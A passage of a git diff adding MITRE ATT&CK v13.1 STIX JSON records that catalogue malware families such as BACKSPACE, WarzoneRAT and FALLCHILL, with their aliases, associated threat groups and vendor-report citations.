[BitPaymer](https://attack.mitre.org/software/S0570) has several indicators suggesting overlap with the [Dridex](https://attack.mitre.org/software/S0384) malware and is often delivered via [Dridex](https://attack.mitre.org/software/S0384).(Citation: Crowdstrike Indrik November 2018)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb261c56-b80e-43a9-8351-c84081e7213d.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb261c56-b80e-43a9-8351-c84081e7213d.json new file mode 100644 index 0000000000000000000000000000000000000000..2791d9bccdf2ca4c81b3339f3efd72ca2dd5bfec --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb261c56-b80e-43a9-8351-c84081e7213d.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--e887f30c-05b3-4cc6-8d48-35e8a81c6b83", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "BACKSPACE", + "Lecna" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--fb261c56-b80e-43a9-8351-c84081e7213d", + "type": "malware", + "created": "2017-05-31T21:32:24.428Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0031", + "external_id": "S0031" + }, + { + "source_name": "FireEye APT30", + "description": "FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.", + "url": "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + } + ], + "modified": "2020-03-30T14:54:21.256Z", + "name": "BACKSPACE", + "description": "[BACKSPACE](https://attack.mitre.org/software/S0031) is a backdoor used by [APT30](https://attack.mitre.org/groups/G0013) that dates back to at least 2005. (Citation: FireEye APT30)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb28627c-d6ea-4c35-b138-ab5e96ae5445.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb28627c-d6ea-4c35-b138-ab5e96ae5445.json new file mode 100644 index 0000000000000000000000000000000000000000..5db1e4dedb9f2f4c0ab46588736c9b1a6dc69d2e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb28627c-d6ea-4c35-b138-ab5e96ae5445.json 
@@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--19bbb009-37df-4e01-b674-ebcf908098b4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T22:03:44.670Z", + "name": "Zox", + "description": "[Zox](https://attack.mitre.org/software/S0672) is a remote access tool that has been used by [Axiom](https://attack.mitre.org/groups/G0001) since at least 2008.(Citation: Novetta-Axiom)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Zox", + "Gresim", + "ZoxRPC", + "ZoxPNG" + ], + "type": "malware", + "id": "malware--fb28627c-d6ea-4c35-b138-ab5e96ae5445", + "created": "2022-01-09T22:02:05.615Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0672", + "external_id": "S0672" + }, + { + "source_name": "Gresim", + "description": "(Citation: Novetta-Axiom)" + }, + { + "source_name": "ZoxRPC", + "description": "(Citation: Novetta-Axiom)" + }, + { + "source_name": "ZoxPNG", + "description": "(Citation: Novetta-Axiom)" + }, + { + "source_name": "Novetta-Axiom", + "description": "Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.", + "url": "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa.json new file mode 100644 index 0000000000000000000000000000000000000000..645365b7c5e15a2a5d44cf80f34d5edb65b73373 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--28d4ef8f-7de1-4df2-a559-4a238e3e6ff5", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "UPPERCUT", + "ANEL" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0275", + "external_id": "S0275" + }, + { + "source_name": "UPPERCUT", + "description": "(Citation: FireEye APT10 Sept 2018)" + }, + { + "source_name": "ANEL", + "description": "(Citation: FireEye APT10 Sept 2018)" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", + "description": "Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.", + "source_name": "FireEye APT10 Sept 2018" + } + ], + "modified": "2020-03-30T18:24:27.229Z", + "name": "UPPERCUT", + "description": "[UPPERCUT](https://attack.mitre.org/software/S0275) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045). (Citation: FireEye APT10 Sept 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb575479-14ef-41e9-bfab-0b7cf10bec73.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb575479-14ef-41e9-bfab-0b7cf10bec73.json new file mode 100644 index 0000000000000000000000000000000000000000..8f33f21ee3063076919ffdd02f54f8b69fc48c8c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb575479-14ef-41e9-bfab-0b7cf10bec73.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--48b37529-03cb-4afe-a9f2-21fe27e78b27", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "ADVSTORESHELL", + "AZZY", + "EVILTOSS", + "NETUI", + "Sedreco" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--fb575479-14ef-41e9-bfab-0b7cf10bec73", + "type": "malware", + "created": "2017-05-31T21:32:34.648Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0045", + "external_id": "S0045" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "description": "ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.", + "source_name": "ESET Sednit Part 2" + } + ], + "modified": "2020-03-30T01:44:19.899Z", + "name": "ADVSTORESHELL", + "description": "[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is a spying backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. 
(Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 2)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb78294a-7d7a-4d38-8ad0-92e67fddc9f0.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb78294a-7d7a-4d38-8ad0-92e67fddc9f0.json new file mode 100644 index 0000000000000000000000000000000000000000..5969036ac03a34e4f6fccfa7c25e76a249da01ad --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fb78294a-7d7a-4d38-8ad0-92e67fddc9f0.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--7783e956-4ee4-4a68-8b40-01daee1f9412", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-11T18:34:04.838Z", + "name": "StrifeWater", + "description": "[StrifeWater](https://attack.mitre.org/software/S1034) is a remote-access tool that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) in the initial stages of their attacks since at least November 2021.(Citation: Cybereason StrifeWater Feb 2022)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "StrifeWater" + ], + "type": "malware", + "id": "malware--fb78294a-7d7a-4d38-8ad0-92e67fddc9f0", + "created": "2022-08-15T16:31:56.856Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1034", + "external_id": "S1034" + }, + { + "source_name": "Cybereason StrifeWater Feb 2022", + "description": "Cybereason Nocturnus. (2022, February 1). StrifeWater RAT: Iranian APT Moses Staff Adds New Trojan to Ransomware Operations. Retrieved August 15, 2022.", + "url": "https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3.json new file mode 100644 index 0000000000000000000000000000000000000000..b63594da01489c0e8fb4634071e711da83232e66 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--1eea7d97-8ad3-4cea-8f24-1eb6d0deb494", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Mivast" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3", + "created": "2017-05-31T21:32:54.044Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0080", + "url": "https://attack.mitre.org/software/S0080" + }, + { + "source_name": "Mivast", + "description": "(Citation: Symantec Black Vine) (Citation: Symantec Backdoor.Mivast)" + }, + { + "source_name": "Symantec Black Vine", + "url": "https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf", + "description": "DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016." + }, + { + "source_name": "Symantec Backdoor.Mivast", + "url": "http://www.symantec.com/security_response/writeup.jsp?docid=2015-020623-0740-99&tabid=2", + "description": "Stama, D.. (2015, February 6). Backdoor.Mivast. Retrieved February 15, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Mivast](https://attack.mitre.org/software/S0080) is a backdoor that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009). It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine)", + "modified": "2022-07-20T20:09:46.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mivast", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fc774af4-533b-4724-96d2-ac1026316794.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fc774af4-533b-4724-96d2-ac1026316794.json new file mode 100644 index 0000000000000000000000000000000000000000..5c8be9d762339063b12b5e7d8610306870b23a78 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fc774af4-533b-4724-96d2-ac1026316794.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--120712fe-410b-419a-8d41-4e6788de3b27", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "HiddenWasp" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--fc774af4-533b-4724-96d2-ac1026316794", + "type": "malware", + "created": "2019-06-24T12:04:32.323Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0394", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0394" + }, + { + "source_name": "HiddenWasp", + "description": "(Citation: Intezer HiddenWasp Map 2019)" + }, + { + "description": "Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.", + "url": "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/", + "source_name": "Intezer HiddenWasp Map 2019" + } + ], + "modified": "2021-04-23T20:07:01.487Z", + "name": "HiddenWasp", + "description": "[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fde19a18-e502-467f-be14-58c71b4e7f4b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fde19a18-e502-467f-be14-58c71b4e7f4b.json new file mode 100644 index 0000000000000000000000000000000000000000..877abe40265fc2fa3d1b9987581f0d95a79c1301 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fde19a18-e502-467f-be14-58c71b4e7f4b.json 
@@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--7fbd040e-1c61-4fc5-b857-16d2f89c4bf2", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Abhijit Mohanta, @abhijit_mohanta, Uptycs", + "Shilpesh Trivedi, Uptycs" + ], + "x_mitre_aliases": [ + "WarzoneRAT", + "Warzone", + "Ave Maria" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--fde19a18-e502-467f-be14-58c71b4e7f4b", + "created": "2021-12-27T17:21:18.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0670", + "url": "https://attack.mitre.org/software/S0670" + }, + { + "source_name": "Ave Maria", + "description": "(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)" + }, + { + "source_name": "Check Point Warzone Feb 2020", + "url": "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/", + "description": "Harakhavik, Y. (2020, February 3). Warzone: Behind the enemy lines. Retrieved December 17, 2021." + }, + { + "source_name": "Uptycs Warzone UAC Bypass November 2020", + "url": "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique", + "description": "Mohanta, A. (2020, November 25). Warzone RAT comes with UAC bypass technique. Retrieved April 7, 2022." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[WarzoneRAT](https://attack.mitre.org/software/S0670) is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)", + "modified": "2022-04-15T14:24:50.745Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "WarzoneRAT", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fde50aaa-f5de-4cb8-989a-babb57d6a704.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fde50aaa-f5de-4cb8-989a-babb57d6a704.json new file mode 100644 index 0000000000000000000000000000000000000000..6e392ad434b1745e6cb7688007202552d371923d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fde50aaa-f5de-4cb8-989a-babb57d6a704.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--87257367-603b-4d67-9ccc-1de600c3c783", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Net Crawler", + "NetC" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--fde50aaa-f5de-4cb8-989a-babb57d6a704", + "created": "2017-05-31T21:32:38.851Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0056", + "url": "https://attack.mitre.org/software/S0056" + }, + { + "source_name": "Cylance Cleaver", + "url": "https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Net Crawler](https://attack.mitre.org/software/S0056) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://attack.mitre.org/software/S0029) to execute a copy of [Net Crawler](https://attack.mitre.org/software/S0056). (Citation: Cylance Cleaver)", + "modified": "2022-07-22T18:37:22.182Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Net Crawler", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--feb2d7bb-aacb-48df-ad04-ccf41a30cd90.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--feb2d7bb-aacb-48df-ad04-ccf41a30cd90.json new file mode 100644 index 0000000000000000000000000000000000000000..d54084a363fc8e26db94611975ab9d822d12d217 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--feb2d7bb-aacb-48df-ad04-ccf41a30cd90.json 
@@ -0,0 +1,79 @@ +{ + "type": "bundle", + "id": "bundle--cc2b68a7-6fea-41b8-b663-267e4120da83", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_aliases": [ + "SLOTHFULMEDIA", + "JackOfHearts", + "QueenOfClubs" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--feb2d7bb-aacb-48df-ad04-ccf41a30cd90", + "type": "malware", + "created": "2020-11-16T23:23:00.729Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0533", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0533" + }, + { + "source_name": "JackOfHearts", + "description": "Kaspersky Labs refers to the \"mediaplayer.exe\" dropper within [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) as the JackOfHearts.(Citation: Kaspersky IAmTheKing October 2020)" + }, + { + "source_name": "QueenOfClubs", + "description": "Kaspersky Labs assesses [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is an older variant of a malware family it refers to as the QueenOfClubs.(Citation: Kaspersky IAmTheKing October 2020)" + }, + { + "source_name": "CISA MAR SLOTHFULMEDIA October 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a", + "description": "DHS/CISA, Cyber National Mission Force. (2020, October 1). Malware Analysis Report (MAR) MAR-10303705-1.v1 \u2013 Remote Access Trojan: SLOTHFULMEDIA. Retrieved October 2, 2020." + }, + { + "source_name": "Costin Raiu IAmTheKing October 2020", + "url": "https://twitter.com/craiu/status/1311920398259367942", + "description": "Costin Raiu. (2020, October 2). Costin Raiu Twitter IAmTheKing SlothfulMedia. Retrieved November 16, 2020." 
+ }, + { + "source_name": "USCYBERCOM SLOTHFULMEDIA October 2020", + "url": "https://twitter.com/CNMF_CyberAlert/status/1311743710997159953", + "description": "USCYBERCOM. (2020, October 1). USCYBERCOM Cybersecurity Alert SLOTHFULMEDIA. Retrieved November 16, 2020." + }, + { + "source_name": "Kaspersky IAmTheKing October 2020", + "url": "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/", + "description": "Ivan Kwiatkowski, Pierre Delcher, Felix Aime. (2020, October 15). IAmTheKing and the SlothfulMedia malware family. Retrieved October 15, 2020." + }, + { + "source_name": "ESET PowerPool Code October 2020", + "url": "https://twitter.com/ESETresearch/status/1311762215490461696", + "description": "ESET Research. (2020, October 1). ESET Research Tweet Linking Slothfulmedia and PowerPool. Retrieved November 17, 2020." + } + ], + "modified": "2021-04-13T20:44:14.476Z", + "name": "SLOTHFULMEDIA", + "description": "[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is a remote access Trojan written in C++ that has been used by an unidentified \"sophisticated cyber actor\" since at least January 2017.(Citation: CISA MAR SLOTHFULMEDIA October 2020)(Citation: Costin Raiu IAmTheKing October 2020) It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.(Citation: USCYBERCOM SLOTHFULMEDIA October 2020)(Citation: Kaspersky IAmTheKing October 2020) \n\nIn October 2020, Kaspersky Labs assessed [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is part of an activity cluster it refers to as \"IAmTheKing\".(Citation: Kaspersky IAmTheKing October 2020) ESET also noted code similarity between [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) and droppers used by a group it refers to as \"PowerPool\".(Citation: ESET PowerPool Code October 2020) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": 
"2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fece06b7-d4b1-42cf-b81a-5323c917546e.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fece06b7-d4b1-42cf-b81a-5323c917546e.json new file mode 100644 index 0000000000000000000000000000000000000000..b8d508e66b4a0d2ee990eaca8ff0466225c3d6e5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--fece06b7-d4b1-42cf-b81a-5323c917546e.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--da3e7237-2cc7-4637-9dda-fd64f5ad3e8c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "FALLCHILL" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--fece06b7-d4b1-42cf-b81a-5323c917546e", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0181", + "external_id": "S0181" + }, + { + "source_name": "FALLCHILL", + "description": "(Citation: US-CERT FALLCHILL Nov 2017)" + }, + { + "url": "https://www.us-cert.gov/ncas/alerts/TA17-318A", + "description": "US-CERT. (2017, November 22). Alert (TA17-318A): HIDDEN COBRA \u2013 North Korean Remote Administration Tool: FALLCHILL. Retrieved December 7, 2017.", + "source_name": "US-CERT FALLCHILL Nov 2017" + } + ], + "modified": "2021-04-23T20:01:10.366Z", + "name": "FALLCHILL", + "description": "[FALLCHILL](https://attack.mitre.org/software/S0181) is a RAT that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff41b9b6-4c1d-407b-a7e2-835109c8dbc5.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff41b9b6-4c1d-407b-a7e2-835109c8dbc5.json new file mode 100644 index 0000000000000000000000000000000000000000..370bf91780bf3eef30bf5a0515cc886102b9f219 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--ff41b9b6-4c1d-407b-a7e2-835109c8dbc5.json 
@@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--5e3d0a2a-9c4d-4e21-98a4-ddc79a95f64e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-14T15:24:24.129Z", + "name": "Small Sieve", + "description": "[Small Sieve](https://attack.mitre.org/software/S1035) is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: NCSC GCHQ Small Sieve Jan 2022)\n\nSecurity researchers have also noted [Small Sieve](https://attack.mitre.org/software/S1035)'s use by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Small Sieve", + "GRAMDOOR" + ], + "type": "malware", + "id": "malware--ff41b9b6-4c1d-407b-a7e2-835109c8dbc5", + "created": "2022-08-16T19:16:48.398Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1035", + "external_id": "S1035" + }, + { + "source_name": "GRAMDOOR", + "description": "(Citation: Mandiant UNC3313 Feb 2022)" + }, + { + "source_name": "DHS CISA AA22-055A MuddyWater February 2022", + "description": "FBI, CISA, CNMF, 